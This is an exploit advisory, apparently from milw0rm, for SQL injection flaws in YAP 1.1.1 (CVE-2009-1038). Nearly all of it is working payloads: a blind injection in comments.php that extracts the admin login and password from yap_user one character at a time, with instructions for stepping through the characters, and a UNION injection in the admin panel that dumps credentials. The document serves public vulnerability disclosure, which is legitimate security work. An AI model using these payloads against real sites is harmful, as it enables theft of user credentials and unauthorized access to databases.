YAP 1.1.1 - Blind SQL Injection / SQL Injection

Related Vulnerabilities: CVE-2009-1038  
Publish Date: 16 Mar 2009
Author: SirGod

[+] YAP 1.1.1 Blind SQL Injection/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org

[+] Blind SQL Injection

  The default prefix for database tables is "yap_" .But can be changed
at installation.

 PoC :[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),1,1))>97

   First character of the username is char(97) , is "a" .[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),2,1))>100

   Second character of the username is char(100) ,is "d" .

 And so on...Change the limit to go to the next char.

[+] SQL Injection

 - Need to be logged in as administrator.[path]/admin/index.php?page=users_modif&action=modif&user=null union all select concat_ws(0x3a,login,pass),2 from yap_user where id=1--


# milw0rm.com [2009-03-16]